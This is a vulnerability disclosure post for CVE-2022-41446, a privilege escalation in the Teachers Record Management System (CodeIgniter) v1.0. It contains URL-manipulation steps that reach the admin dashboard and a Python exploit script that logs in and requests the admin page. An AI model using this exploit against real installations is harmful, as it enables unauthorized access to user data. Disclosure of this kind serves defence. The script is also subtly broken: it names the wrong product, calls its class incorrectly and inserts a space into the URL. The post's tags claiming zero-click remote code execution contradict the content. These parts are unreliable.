Post

CVE-2022-41446 - Escalation of Privileges in Teachers Record Management System Using CodeIgniter 1.0

Posted
By RashidKhan Pathan 3 min read

Date: Nov 3, 2022

Vulnerability Type: Incorrect Access Control - Privilege Escalation

Vendor: Phpgurukul

Affected Product: Teachers Record Management System using CodeIgniter - 1.0

Description: A critical access control issue has been exposed in /Admin/dashboard.php of the Teachers Record Management System using CodeIgniter v1.0 (CVE-2022-41446). This vulnerability permits attackers to illicitly access and modify user data, resulting in a potentially severe escalation of privileges and information disclosure.

Steps to Reproduce:

  1. Log in with a user account in the Teachers Record Management System.
  2. Navigate to the user’s dashboard by accessing the URL: http://localhost/trms-ci/user/Users/dashboard.
  3. Modify the URL endpoint to admin/Admin/dashboard, creating the URL: http://localhost/trms-ci/admin/Admin/dashboard.
  4. Access the manipulated URL, granting unauthorized access to the admin dashboard.
  5. Observe and potentially modify user data within the admin dashboard.

Proof of Concept: View Proof of Concept

Exploit Code

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76

# /*
# Authenticated Vertical Privilege Escalation Vulnerability
# Step: 1 Login With Teacher's Credentials Username: amit@gmail.com Password: Test@123
# Step: 2 Change user/User to admin/Admin Url Patemeter
# */

import argparse
import requests
from termcolor import cprint
import sys
from bs4 import *
color = "green"
cprint("[+] CVE-2022-41446 Authenticated Privilege Escalation in Blood Donor Management System v1.0", color)
cprint("[+] Author: RashidKhan Pathan aka iHexCoder", color)
cprint("[!] Usage: run exploit.py username password payload", color)
cprint("[!] Example: python3 exploit.py admin johndoe@gmail.com Test@123", color)

class PrivilegeEscalation(object):
    color = "green"

    def __init__(self, username, password, payload):
        self.username = username
        self.password = password
        self.paylaod = payload

    def authentication(self):
        color = "green"
        cprint("[+] Authenticating User", color)
        cprint("[+] Username: " + args.username, color)
        cprint("[+] Password: " + args.password, color)
        cprint("[+] Payload: " + args.payload, color)

        login_url = "http://localhost/trms-ci/user/login"

        data = {
            "email": args.username,
            "password": args.password
        }
        login_response = requests.post(login_url, data=data)

        cprint("[+] Exploiting...Started", color)
        if "/user/login" in login_response.url:
            cprint("[+] Credentials is not Valid", "red")
            sys.exit(1)
        else:
            cprint("[+] Authenticated Successfully as a Normal User ", color)
            cprint("[+] Normal User URL Endpoint " + login_response.url, color)

        url = args.payload
        if args.payload != "admin/Admin":
            cprint("[+] Please Add Valid Payload", "red")
            sys.exit(1)
                                                                # Keep The Space Here Beetween r and d
                                                                # But remove The Space Between r and d in URL
        response = requests.get(f"http://localhost/trms-ci/{url}/dashboar d")
        cprint("[+] Remove The Space Between r and d in URL", color)
        cprint("[+] Exploit Compleated", color)
        cprint("[+] Accessed Admin Panel Successfully " +
               response.url, color)
        cprint("[+] Copy the URL and Replace with user/User/dashboard URL with " +
               response.url, color)
        cprint(
            "[+] After Replacing it You Should see the Bypassed Admin Panel", color)


if __name__ == "__main__":
    parser = argparse.ArgumentParser()
    parser.add_argument("username", help="Please Add Username", type=str)
    parser.add_argument("password", help="Please Add Password", type=str)
    parser.add_argument("payload", help="Please Add Password", type=str)
    args = parser.parse_args()

    privilegeEscalation = PrivilegeEscalation

    privilegeEscalation.authentication(
        (args.username, args.password, args.payload))

Attack Vector: To exploit this vulnerability, an attacker must log in with a user account and manipulate the URL endpoint from user/Users/dashboard to admin/Admin/dashboard. This manipulation grants unauthorized access to the admin dashboard, allowing potential modification of user data.

Impact: This access control vulnerability poses a severe risk, enabling remote attackers to escalate privileges and potentially disclose sensitive information.

Reference:

Mitigation: To address this security flaw, it is crucial to implement robust access controls, ensuring that users can only access functionalities appropriate to their roles. Regular security assessments and audits are essential for identifying and remediating vulnerabilities in web applications.

Discoverer: RashidKhan Pathan

Exploit, Zero-Click Exploit, Remote Code Execution, Web Exploitation, 0Day
exploit 0Day WebApp Exploitation Remote Code Execution
This post is licensed under CC BY 4.0 by the author.